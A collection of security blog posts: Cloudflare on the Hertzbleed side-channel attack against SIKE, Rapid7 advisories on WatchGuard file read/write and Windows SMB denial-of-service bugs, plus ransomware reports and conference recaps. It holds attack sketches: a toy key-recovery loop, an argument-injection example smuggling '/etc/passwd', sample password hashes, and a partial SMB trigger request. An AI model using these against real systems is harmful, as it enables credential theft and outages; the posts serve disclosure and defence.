For performance reasons, SIKE uses one of the fastest elliptic curve models: Montgomery curves. The special property that makes these curves fast is that they allow working only with the x-coordinate of points. Hence, one can express the x-coordinate as a fraction x = X / Z, without using the y-coordinate at all. This representation simplifies the calculation of point additions, scalar multiplications, and isogenies between curves. Nonetheless, such simplicity does not come for free, and there is a price to be paid.

The formulas for point operations using Montgomery curves have some edge cases. More technically, a formula is said to be complete if for any valid input a valid output point is produced. Otherwise, a formula is not complete, meaning that there are some exceptional inputs for which it cannot produce a valid output point.


In practice, algorithms working with incomplete formulas must be designed in such a way that edge cases never occur. Otherwise, algorithms could trigger some undesired effects. Let’s take a closer look at what happens in this situation.

A subtle yet relevant property of some incomplete formulas is the nature of the output they produce when operating on points in the exceptional set. On such anomalous inputs, the output has both coordinates equal to zero, so X=0 and Z=0. If we recall our basics on fractions, the fraction X/Z = 0/0 is clearly odd; it has always been regarded as not well-defined. This intuition is not wrong: something bad just happened. This fraction does not represent a valid point on the curve. In fact, it is not even a (projective) point.

The domino effect


Exploiting this subtlety of the mathematical formulas makes a case for the Hertzbleed side-channel attack. In SIKE, whenever an edge case occurs somewhere in the middle of its execution, it produces a domino effect that propagates the zero coordinates through all subsequent computations, so the whole algorithm gets stuck on zeros. As a result, the computation is corrupted and produces a zero at the end, but what is worse is that an attacker can use this domino effect to make guesses about the bits of secret keys.

Guessing one bit of the key requires the attacker to trigger an exceptional case exactly at the point at which that bit is used. It may look like the attacker needs to be super lucky to trigger edge cases when it only has control of the input points. Fortunately for the attacker, the internal algorithm used in SIKE has some invariants that help hand-craft points that trigger an exceptional case at exactly the right moment. A systematic study of all exceptional points and edge cases was independently shown by De Feo et al. as well as in the Hertzbleed article.

With these tools at hand, and using the DVFS side channel, the attacker can now guess the secret key bit by bit by passing hand-crafted invalid input points. There are two cases an attacker can observe when the SIKE algorithm uses the secret key:

  • If the bit of interest is equal to the one before it, no edge case occurs, computation proceeds normally, and the program takes the expected amount of wall time, since all the calculations are performed over random-looking data.
  • If the bit of interest differs from the one before it, the algorithm enters the exceptional case, triggering the domino effect for the rest of the computation, and DVFS makes the program run faster as it automatically raises the CPU’s frequency.

By querying this oracle repeatedly, the attacker can learn, bit by bit, the secret key used in SIKE.
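
The recovery loop has a simple shape. Below is a toy simulation of it: the timing oracle is a stand-in for actually crafting malformed points and measuring decapsulation wall time, and the first key bit is assumed known, purely for illustration.

import random

SECRET = [random.randint(0, 1) for _ in range(16)]  # toy stand-in for a key

def timing_oracle(i: int) -> float:
    """Simulated wall time for a run against bit i: the domino effect of
    zeros makes the run 'fast' when bit i differs from bit i - 1, and
    'normal' otherwise."""
    return 1.0 if SECRET[i] != SECRET[i - 1] else 1.5

recovered = [SECRET[0]]  # assume the first bit is known
for i in range(1, len(SECRET)):
    differed = timing_oracle(i) < 1.25  # a fast run means the bits differ
    recovered.append(recovered[-1] ^ int(differed))

assert recovered == SECRET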

Ok, let’s recap.

SIKE uses special formulas to speed up operations, but if these formulas are forced to hit certain edge cases, they will fail. Failing due to these edge cases not only corrupts the computation but also makes the formulas output coordinates with zeros, which in machine representation amount to several registers all loaded with zeros. If the computation continues without noticing the presence of these edge cases, the processor registers will be stuck on 0 for the rest of the computation. Finally, at the hardware level, some instructions consume fewer resources when their operands are zeroed. Because of that, the DVFS machinery reacts to the reduced power draw by raising the CPU frequency above the steady state. The ultimate result is a program that runs faster or slower depending on whether it operates on all zeros or on random-looking data.


Hertzbleed’s authors contacted Cloudflare Research because they had demonstrated a successful attack on CIRCL, our optimized Go cryptographic library that includes SIKE. We worked closely with the authors to find potential mitigations in the early stages of their research. While the embargo of the disclosure was in effect, another research group, including De Feo et al., independently described a systematic study of the possible failures of SIKE formulas, including the same attack found by the Hertzbleed team, and pointed to a proper countermeasure. Hertzbleed borrows that countermeasure.

What countermeasures are available for SIKE?


The immediate action specific for SIKE is to prevent edge cases from occurring in the first place. Most SIKE implementations provide a certain amount of leeway, assuming that inputs will not trigger exceptional cases. This is not a safe assumption. Instead, implementations should be hardened and should validate that inputs and keys are well-formed.

Enforcing a strict validation of untrusted inputs is always the recommended action. For example, a common check on elliptic curve-based algorithms is to validate that inputs correspond to points on the curve and that their coordinates are in the proper range from 0 to p-1 (as described in Section 3.2.2.1 of SEC 1). These checks also apply to SIKE, but they are not sufficient.

What malformed inputs have in common in the case of SIKE is that input points can have arbitrary order. That is, in addition to checking that points lie on the curve, implementations must also check that they have the prescribed order before treating them as valid. This is akin to small subgroup attacks in the Diffie-Hellman setting over finite fields. In SIKE, there are several overlapping groups on the same curve, and input points with incorrect order must be detected.

The countermeasure, originally proposed by Costello et al., consists of verifying that the input points have the right (full) order. To do so, we check that an input point vanishes only when multiplied by its expected order, and not before, when multiplied by smaller scalars. The hand-crafted invalid points will not pass this validation routine, which prevents edge cases from appearing during the algorithm’s execution. In practice, we observed around a 5-10% performance overhead on SIKE decapsulation. The ciphertext validation is available in CIRCL as of version v1.2.0. We strongly recommend updating your projects that depend on CIRCL to this version, so you can make sure that strict validation of SIKE inputs is in place.
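
The shape of the check is easy to see in a toy group. The sketch below uses the multiplicative group modulo a small prime in place of a Montgomery curve (real implementations use x-only point multiplication instead of modular exponentiation), but the validation logic is the same: accept an element only if it vanishes at the expected order N and not already at N/2.

p = 257  # toy prime: element orders divide p - 1 = 2^8
N = 256  # the expected full order

def has_full_order(x: int) -> bool:
    # Must NOT vanish early (at N/2) and MUST vanish at N.
    return pow(x, N // 2, p) != 1 and pow(x, N, p) == 1

print(has_full_order(3))  # True: 3 generates the whole group mod 257
print(has_full_order(4))  # False: 4 lies in a smaller subgroup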


Closing comments

Hertzbleed shows that certain workloads can induce changes in the processor’s frequency scaling, making programs run faster or slower. In this setting, small differences in the bit pattern of data result in observable differences in execution time. This puts a spotlight on the state-of-the-art techniques we use to protect against timing attacks, and it makes us rethink the measures needed to produce constant-time code and secure implementations. Defending against features like DVFS is something programmers should start to consider too.

Although SIKE was the victim this time, it is possible that other cryptographic algorithms may expose similar symptoms that can be leveraged by Hertzbleed. An investigation of other targets with this brand-new tool in the attacker’s portfolio remains an open problem.

Hertzbleed allowed us to learn more about how the machines in front of us work and how the processor constantly monitors itself, optimizing the performance of the system. Hardware manufacturers have focused on processor performance by providing many optimizations; however, further study of the security of computations is also needed.

If you are excited about this project, at Cloudflare we are working on raising the bar on the production of code for cryptography. Reach out to us if you are interested in high-assurance tools for developers, and don’t forget our outreach programs whether you are a student, a faculty member, or an independent researcher.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/06/23/cve-2022-31749-watchguard-authenticated-arbitrary-file-read-write-fixed/

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

A remote and low-privileged WatchGuard Firebox or XTM user can read arbitrary system files when using the SSH interface, due to an argument injection vulnerability affecting the diagnose command. Additionally, a remote and highly privileged user can write arbitrary system files when using the SSH interface, due to an argument injection affecting the import pac command. Rapid7 reported these issues to WatchGuard, and the vulnerabilities were assigned CVE-2022-31749. On June 23, WatchGuard published an advisory and released patches in Fireware OS 12.8.1, 12.5.10, and 12.1.4.

Background

WatchGuard Firebox and XTM appliances are firewall and VPN solutions whose form factors span tabletop, rack-mounted, virtualized, and “rugged” ICS designs. The appliances share a common underlying operating system named Fireware OS.

At the time of writing, there are more than 25,000 WatchGuard appliances with their HTTP interface discoverable on Shodan. There are more than 9,000 WatchGuard appliances exposing their SSH interface.

In February 2022, GreyNoise and CISA published details of WatchGuard appliances vulnerable to CVE-2022-26318 being exploited in the wild. Rapid7 discovered CVE-2022-31749 while analyzing the WatchGuard XTM appliance for the writeup of CVE-2022-26318 on AttackerKB.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vulnerability details

CVE-2022-31749 is an argument injection into the ftpput and ftpget commands. The arguments are injected when the SSH CLI prompts the attacker for a username and password when using the diagnose or import pac commands. For example:

WG>diagnose to ftp://test/test
Name: username
Password: 

The “Name” and “Password” values are not sanitized before they are combined into the “ftpput” and “ftpget” commands and executed via librmisvc.so. Execution occurs using execle, so command injection isn’t possible, but argument injection is. Using this injection, an attacker can upload and download arbitrary files.
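
The distinction matters: with execle there is no shell, so metacharacters like ; are harmless, but if untrusted input is interpolated into the command line before it is split into an argument vector, whitespace still smuggles in extra arguments. A sketch of the vulnerable pattern in Python (the -s flag here is purely illustrative, not an actual WatchGuard ftpput option):

def build_argv(user: str, password: str, host: str, path: str) -> list[str]:
    # Vulnerable pattern: interpolate untrusted values into a command
    # string, then split it into argv for an execle()-style call.
    return f"ftpput -u {user} -p {password} {host} {path}".split()

# The spaces in the "username" inject an extra flag/value pair.
print(build_argv("alice -s /etc/passwd", "hunter2", "192.0.2.1", "/tmp/out"))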

File writing turns out to be less useful than an attacker would hope. The problem, from an attacker’s point of view, is that WatchGuard has locked down much of the file system, and the user can only modify a few directories: /tmp/, /pending/, and /var/run. At the time of writing, we don’t see a way to escalate the file write into code execution, though we wouldn’t rule it out as a possibility.

The low-privileged user file read is interesting because WatchGuard has a built-in low-privileged user named status. This user is intended to have “read-only” access to the system. In fact, historically speaking, the default password for this user was “readonly”. Using CVE-2022-31749, this low-privileged user can exfiltrate the configd-hash.xml file, which contains user password hashes when Firebox-DB is in use. Example:

<?xml version="1.0"?>
<users>
  <version>3</version>
  <user name="admin">
    <enabled>1</enabled>
    <hash>628427e87df42adc7e75d2dd5c14b170</hash>
    <domain>Firebox-DB</domain>
    <role>Device Administrator</role>
  </user>
  <user name="status">
    <enabled>1</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
  <user name="wg-support">
    <enabled>0</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
</users>

The hashes are just unsalted MD4 hashes. @funoverip wrote about cracking these weak hashes using Hashcat all the way back in 2013.

Exploitation

Rapid7 has published a proof of concept that exfiltrates the configd-hash.xml file via the diagnose command. The following video demonstrates its use against WatchGuard XTMv 12.1.3 Update 8.



[Video: proof-of-concept demonstration against WatchGuard XTMv 12.1.3 Update 8]

Remediation

Apply the WatchGuard Fireware updates. If possible, remove internet access to the appliance’s SSH interface. Out of an abundance of caution, changing passwords after updating is a good idea.

Vendor statement

WatchGuard thanks Rapid7 for their quick vulnerability report and willingness to work through a responsible disclosure process to protect our customers. We always appreciate working with external researchers to identify and resolve vulnerabilities in our products and we take all reports seriously. We have issued a resolution for this vulnerability, as well as several internally discovered issues, and advise our customers to upgrade their Firebox and XTM products as quickly as possible. Additionally, we recommend all administrators follow our published best practices for secure remote management access to their Firebox and XTM devices.

Disclosure timeline

March, 2022: Discovered by Jake Baines of Rapid7
Mar 29, 2022: Reported to WatchGuard via support phone; issue assigned case number 01676704.
Mar 29, 2022: WatchGuard acknowledged the report in a follow-up email.
April 20, 2022: Rapid7 followed up, asking for progress.
April 21, 2022: WatchGuard acknowledged again they were researching the issue.
May 26, 2022: Rapid7 checked in on status of the issue.
May 26, 2022: WatchGuard indicates patches should be released in June, and asks about CVE assignment.
May 26, 2022: Rapid7 assigns CVE-2022-31749
June 23, 2022: This disclosure


New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/16/new-report-shows-what-data-is-most-at-risk-to-and-prized-by-ransomware-attackers/

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Ransomware is one of the most pressing and diabolical threats faced by cybersecurity teams today. Gaining access to a network and holding that data for ransom has caused billions in losses across nearly every industry and around the world. It has stopped critical infrastructure like healthcare services in its tracks, putting the lives and livelihoods of many at risk.

In recent years, threat actors have upped the ante by using “double extortion” as a way to inflict maximum pain on an organization. Through this method, not only are threat actors holding data hostage for money – they also threaten to release that data (either publicly or for sale on dark web outlets) to extract even more money from companies.

At Rapid7, we often say that when it comes to ransomware, we may all be targets, but we don’t all have to be victims. We have means and tools to mitigate the impact of ransomware — and one of the most important assets we have on our side is data about ransomware attackers themselves.

Reports about trends in ransomware are pretty common these days. But what isn’t common is information about what kinds of data threat actors prefer to collect and release.

A new report from Rapid7’s Paul Prudhomme uses proprietary data collection tools to analyze the disclosure layer of double-extortion ransomware attacks. He identified the types of data attackers initially disclose to coerce victims into paying ransom, determined trends across industries, and released the findings in a first-of-its-kind analysis.

“Pain Points: Ransomware Data Disclosure Trends” reveals a story of how ransomware attackers think, what they value, and how they approach applying the most pressure on victims to get them to pay.

The report looks at all ransomware data disclosure incidents reported to customers through our Threat Command threat intelligence platform (TIP). It also incorporates threat intelligence coverage and Rapid7’s institutional knowledge of ransomware threat actors.

From this, we were able to determine:

  • The most common types of data attackers disclosed in some of the most highly affected industries, and how they differ
  • How leaked data differs by threat actor group and target industry
  • The current state of the ransomware market share among threat actors, and how that has changed over time

Finance, pharma, and healthcare

Overall, trends in ransomware data disclosures pertaining to double extortion varied slightly, except in a few key verticals: pharmaceuticals, financial services, and healthcare. In general, financial data was leaked most often (63%), followed by customer/patient data (48%).

However, in the financial services sector, customer data was leaked most of all, rather than financial data from the firms themselves. Some 82% of disclosures linked to the financial services sector were of customer data. Internal company financial data, which was the most exposed data in the overall sample, made up just 50% of data disclosures in the financial services sector. Employees’ personally identifiable information (PII) and HR data were more prevalent, at 59%.

In the healthcare and pharmaceutical sectors, internal financial data was leaked some 71% of the time, more than any other industry — even the financial services sector itself. Customer/patient data also appeared with high frequency, having been released in 58% of disclosures from the combined sectors.

One thing that stood out about the pharmaceutical industry was the propensity of threat actors to release intellectual property (IP) files. In the overall sample, just 12% of disclosures included IP files, but in the pharma industry, 43% of all disclosures included IP. This is likely due to the high value placed on research and development within this industry.

The state of ransomware actors

One of the more interesting results of the analysis was a clearer understanding of the state of ransomware threat actors. It’s always critical to know your enemy, and with this analysis, we can pinpoint the evolution of ransomware groups, what data the individual groups value for initial disclosures, and their prevalence in the “market.”

For instance, between April and December 2020, the now-defunct Maze ransomware group was responsible for 30% of ransomware data disclosures. This “market share” was only slightly lower than that of the next two most prevalent groups combined (REvil/Sodinokibi at 19% and Conti at 14%). However, the demise of Maze in November 2020 saw many smaller actors stepping in to take its place. Conti and REvil/Sodinokibi swapped places (19% and 15%, respectively), barely making up for the shortfall left by Maze. The top five groups in 2021 made up just 56% of all attacks, with a variety of smaller, lesser-known groups responsible for the rest.

Recommendations for security operations

While there is no silver bullet to the ransomware problem, there are silver linings in the form of best practices that can help to protect against ransomware threat actors and minimize the damage, should they strike. This report offers several that are aimed around double extortion, including:

  • Going beyond backing up data by also employing strong encryption and network segmentation
  • Prioritizing certain types of data for extra protection, particularly in fields where threat actors seek out that data specifically in order to hurt those organizations the hardest
  • Understanding that certain industries will be targets of certain types of leaks, and ensuring that customers, partners, and employees understand the heightened risk of disclosures of those types of data and are prepared for them

To get more insights and view some (well redacted) real-world examples of data breaches, check out the full paper.


Complimentary GartnerⓇ Report “How to Respond to the 2022 Cyberthreat Landscape”: Ransomware Edition

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/15/complimentary-gartner-report-how-to-respond-to-the-2022-cyberthreat-landscape-ransomware-edition/

Complimentary GartnerⓇ Report

First things first: if you’re a member of a cybersecurity team bouncing from one stressful identify-vulnerability-patch-repeat cycle to another, claim your copy of the GartnerⓇ report “How to Respond to the 2022 Cyberthreat Landscape” right now. It will help you understand the current landscape and better plan for what’s happening now and in the near term.

Ransomware is on the tip of every security professional’s tongue right now, and for good reason. It’s growing, spreading, and evolving faster than many organizations can keep up with. But just because we may all be targets doesn’t mean we have to be victims.

The analysts at Gartner have taken a good, long look at the latest trends in security, with a particular eye toward ransomware, and they had this to say about attacker trends in their report.

Expect attackers to:

  • “Diversify their targets by pursuing lower-profile targets more frequently, using smaller attacks to avoid attention from well-funded nation states.”
  • “Attack critical CPS, particularly when motivated by geopolitical tensions and aligned ransomware actors.”
  • “Optimize ransomware delivery by using ‘known good’ cloud applications, such as enterprise productivity software as a service (SaaS) suites, and using encryption to hide their activities.”
  • “Target individual employees, particularly those working remotely using potentially vulnerable remote access services like Remote Desktop Protocol (RDP) services, or simply bribe employees for access to organizations with a view to launching larger ransomware campaigns.”
  • “Exfiltrate data as part of attempts to blackmail companies into paying ransom or risk data breach disclosure, which may result in regulatory fines and limits the benefits of the traditional mitigation method of ‘just restore quickly.'”
  • “Combine ransomware with other techniques, such as distributed denial of service (DDoS) attacks, to force public-facing services offline until organizations pay a ransom.”

Ransomware is most definitely considered a “top threat,” and it has moved beyond being just an IT problem to one that involves governments around the globe. Attackers recognize that the game got a lot bigger with well-funded nations joining the fray to combat it, so their tactics will be targeted, small, diverse, and more frequent to avoid poking the bear(s). Expect to see smaller organizations targeted more often, including as part of ransomware-as-a-service campaigns.

Gartner also says that attackers will use RaaS to attack critical infrastructure like CPS more frequently:

“Attackers will aim at smaller targets and deliver ‘ransomware as a service’ to other groups. This will enable more targeted and sophisticated attacks, as the group targeting an organization will have access to ransomware developed by a specialist group. Attackers will also target critical assets, such as CPS.”

Mitigating ransomware

But there are things we can do to mitigate ransomware attacks and push back against the attackers. Gartner suggests several key recommendations, including:

  • “Construct a pre-incident strategy that includes backup (including a restore test), asset management, and restriction of user privileges.”
  • “Build post-incident response procedures by training staff and scheduling regular drills.”
  • “Expand the scope of ransomware protection programs to CPS.”
  • “Increase cross-team training for the nontechnical aspects of a ransomware incident.”
  • “Remember that payment of a ransom does not guarantee erasure of exfiltrated data, full recovery of encrypted data, or immediate restoration of operations.”
  • “Don’t rely on cyber insurance only. There is frequently a disconnect between what executive leaders expect a cybersecurity insurance policy to cover and what it actually does cover.”

At Rapid7, we have the risk management, detection and response, and threat intelligence tools your organization needs to not only keep up with the evolution in ransomware threat actors, but to implement best practices of the industry.

If you want to learn more about what cybersecurity threats are out there now and on the horizon, check out the complimentary Gartner report.

Gartner, How to Respond to the 2022 Cyberthreat Landscape, 1 April 2022, by Jeremy D’Hoinne, John Watts, Katell Thielemann

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.


CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer dereference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

[Figure: patch diff of srv2!Smb2ValidateVolumeObjectsMatch, with the unpatched version 10.0.19041.1566 on the left]

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE, FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This typically requires user permissions or a non-default configuration enabling guest access. The noteworthy exception is domain controllers, where multiple named pipes, such as netlogon, can be opened anonymously. An alternative named pipe that can be used, but that does typically require permissions, is the srvsvc pipe.
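
For reference, the fixed-size portion of the request that reaches the vulnerable code path is small. Here is a sketch of the SMB2 QUERY_INFO request body per MS-SMB2 section 2.2.37; the constants are taken from the specification, and a real request additionally needs a full SMB2 session, a tree connect to IPC$, and an open pipe handle.

import struct

SMB2_0_INFO_FILE = 0x01                # InfoType: file information
FILE_NORMALIZED_NAME_INFORMATION = 48  # FileInformationClass value

def query_info_body(file_id: bytes) -> bytes:
    assert len(file_id) == 16          # SMB2 FileId of the opened named pipe
    return struct.pack(
        "<HBBIHHIII16s",
        41,                                # StructureSize (always 41)
        SMB2_0_INFO_FILE,                  # InfoType
        FILE_NORMALIZED_NAME_INFORMATION,  # FileInfoClass
        1024,                              # OutputBufferLength
        0,                                 # InputBufferOffset
        0,                                 # Reserved
        0,                                 # InputBufferLength
        0,                                 # AdditionalInformation
        0,                                 # Flags
        file_id,                           # FileId
    )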

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED.

Proof of concept

A proof-of-concept Metasploit module is available on GitHub. It requires Metasploit version 6.2 or later.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.

Disclosure timeline

April 12th, 2022 – Microsoft patches CVE-2022-32230
April 29th, 2022 – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
May 4th, 2022 – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
May 18th, 2022 – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
June 1st, 2022 – Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
June 14th, 2022 – Rapid7 releases details in this disclosure, and Microsoft publishes its advisory


Defending Against Tomorrow’s Threats: Insights From RSAC 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/13/defending-against-tomorrows-threats-insights-from-rsac-2022/

Defending Against Tomorrow's Threats: Insights From RSAC 2022

The rapidly changing pace of the cyberthreat landscape is on every security pro’s mind. Not only do organizations need to secure complex cloud environments, they’re also more aware than ever that their software supply chains and open-source elements of their application codebase might not be as ironclad as they thought.

It should come as no surprise, then, that defending against a new slate of emerging threats was a major theme at RSAC 2022. Here’s a closer look at what some Rapid7 experts who presented at this year’s RSA conference in San Francisco had to say about staying ahead of attackers in the months to come.

Surveying the threat landscape

Security practitioners often turn to Twitter for the latest news and insights from peers. As Raj Samani, SVP and Chief Data Scientist, and Lead Security Researcher Spencer McIntyre pointed out in their RSA talk, “Into the Wild: Exploring Today’s Top Threats,” the trend holds true when it comes to emerging threats.

“For many people, identifying threats is actually done through somebody that I follow on Twitter posting details about a particular vulnerability,” said Raj.

As Spencer noted, security teams need to be able to filter all these inputs and identify the actual priorities that require immediate patching and remediation. And that’s where the difficulty comes in.

“How do you manage a patching strategy when there are critical vulnerabilities coming out … it seems weekly?” Raj asked. “Criminals are exploiting these vulnerabilities literally in days, if that,” he continued.

Indeed, the average time to exploit — i.e., the interval between a vulnerability being discovered by researchers and clear evidence of attackers using it in the wild — plummeted from 42 days in 2020 to 17 days in 2021, as noted in Rapid7’s latest Vulnerability Intelligence Report. With so many threats emerging at a rapid clip and so little time to react, defenders need the tools and expertise to understand which vulnerabilities to prioritize and how attackers are exploiting them.

“Unless we get a degree of context and an understanding of what’s happening, we’re going to end up ignoring many of these vulnerabilities because we’ve just got other things to worry about,” said Raj.

The evolving threat of ransomware

One of the things that worry security analysts, of course, is ransomware — and as the threat has grown in size and scope, the ransomware market itself has changed. Cybercriminals are leveraging this attack vector in new ways, and defenders need to adapt their strategies accordingly.

That was the theme that Erick Galinkin, Principal AI Researcher, covered in his RSA talk, “How to Pivot Fast and Defend Against Ransomware.” Erick identified four emerging ransomware trends that defenders need to be aware of:

  • Double extortion: In this type of attack, threat actors not only demand a ransom for the data they’ve stolen and encrypted but also extort organizations for a second time — pay an additional fee, or they’ll leak the data. This means that even if you have backups of your data, you’re still at risk from this secondary ransomware tactic.
  • Ransomware as a service (RaaS): Not all threat actors know how to write highly effective ransomware. With RaaS, they can simply purchase malicious software from a provider, who takes a cut of the payout. The result is a broader and more decentralized network of ransomware attackers.
  • Access brokers: A kind of mirror image to RaaS, access brokers give a leg up to bad actors who want to run ransomware on an organization’s systems but need an initial point of entry. Now, that access is for sale in the form of phished credentials, cracked passwords, or leaked data.
  • Lateral movement: Once a ransomware attacker has infiltrated an organization’s network, they can use lateral movement techniques to gain a higher level of access and ransom the most sensitive, high-value data they can find.

With the ransomware threat growing by the day and attackers’ techniques growing more sophisticated, security pros need to adapt to the new landscape. Here are a few of the strategies Erick recommended for defending against these new ransomware tactics.

  • Continue to back up all your data, and protect the most sensitive data with strong admin controls.
  • Don’t get complacent about credential theft — the spoils of a might-be phishing attack could be sold by an access broker as an entry point for ransomware.
  • Implement the principle of least privilege, so only administrator accounts can perform administrator functions — this will help make lateral movement easier to detect.

Shaping a new kind of SOC

With so much changing in the threat landscape, how should the security operations center (SOC) respond?

This was the focus of “Future Proofing the SOC: A CISO’s Perspective,” the RSA talk from Jeffrey Gardner, Practice Advisor for Detection and Response (D&R). In addition to the sprawling attack surface, security analysts are also experiencing a high degree of burnout, understandably overwhelmed by the sheer volume of alerts and threats. To alleviate some of the pressure, SOC teams need a few key things.

For Jeffrey, these needs are best met through a hybrid SOC model — one that combines internally owned SOC resources and staff with external capabilities offered through a provider, for a best-of-both-worlds approach. The framework for this approach is already in place, but the version that Jeffrey and others at Rapid7 envision involves some shifting of paradigms. These include:

  • Collapsing the distinction between product and service and moving toward “everything as a service,” with a unified platform that allows resources — which includes everything from in-product features to provider expertise and guidance — to be delivered at a sliding scale
  • Ensuring full transparency, so the organization understands not only what’s going on in their own SOC but also in their provider’s, through the use of shared solutions
  • More customization, with workflows, escalations, and deliverables tailored to the customer’s needs

Meeting the moment

It’s critical to stay up to date with the most current vulnerabilities we’re seeing and the ways attackers are exploiting them — but to be truly valuable, those insights must translate into action. Defenders need strategies tailored to the realities of today’s threat landscape.

For our RSA 2022 presenters, that might mean going back to basics with consistent data backups and strong admin controls. Or it might mean going bold by fully reimagining the modern SOC. The techniques don’t have to be new or fancy to be effective — they simply have to meet the moment. (Although if the right tactics turn out to be big and game-changing, we’ll be as excited as the next security pro.)

Looking for more insights on how defenders can protect their organizations amid today’s highly dynamic threat landscape? You can watch these presentations — and even more from our Rapid7 speakers — at our library of replays from RSAC 2022.


[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/10/video-an-inside-look-at-the-rsa-2022-experience-from-the-rapid7-team/

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

The two years since the last RSA Conference have been pretty uneventful. Sure, COVID-19 sent us all to work from home for a little while, but it’s not as though we’ve seen any supply-chain-shattering breaches, headline-grabbing ransomware attacks, internet-inferno vulnerabilities, or anything like that. We’ve mostly just been baking sourdough bread and doing woodworking in between Zoom meetings.

OK, just kidding on basically all of that (although I, for one, have continued to hone my sourdough game). ​

The reality has been quite the opposite. Whether it’s because an unprecedented number of crazy things have happened since March 2020 or because pandemic-era uncertainty has made all of our experiences feel a little more heightened, the past 24 months have been a lot. And now that restrictions on gatherings are largely lifted in most places, many of us are feeling like we need a chance to get together and debrief on what we’ve all been through.

Given that context, what better timing could there have been for RSAC 2022? This past week, a crew of Rapid7 team members gathered in San Francisco to sync up with the greater cybersecurity community and take stock of how we can all stay ahead of attackers and ready for the future in the months to come. We asked four of them — Jeffrey Gardner, Practice Advisor – Detection & Response; Tod Beardsley, Director of Research; Kelly Allen, Social Media Manager; and Erick Galinkin, Principal Artificial Intelligence Researcher — to tell us a little bit about their RSAC 2022 experience. Here’s a look at what they had to say — and a glimpse into the excitement and energy of this year’s RSA Conference.

What’s it been like returning to full-scale in-person events after 2 years?

What was your favorite session or speaker of the week? What made them stand out?

What was your biggest takeaway from the conference? How will it shape the way you think about and practice cybersecurity in the months to come?

Want to relive the RSA experience for yourself? Check out our replays of Rapid7 speakers’ sessions from the week.


The Hidden Harm of Silent Patches

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/06/the-hidden-harm-of-silent-patches/

The Hidden Harm of Silent Patches

Hey all. I’m about to head off to RSAC 2022, but I wanted to jot down some thoughts I’ve had lately on a particularly squirrelly issue that comes up occasionally in coordinated vulnerability disclosure (CVD) — the issue of silent patches, and how they tend to help focused attackers and harm IT protectors.

In the bad old days, most major software vendors were rather notorious for sweeping vulnerability reports under the rug. They made it difficult for legitimate researchers to report vulnerabilities, often by accident, occasionally on purpose. Researchers would report bugs, and those reports would fester in unobserved space, then suddenly the proof-of-concept exploit wouldn’t work any more. This was (and is) the standard silent patching model. No credit, no explanation, no CVE ID, nothing.

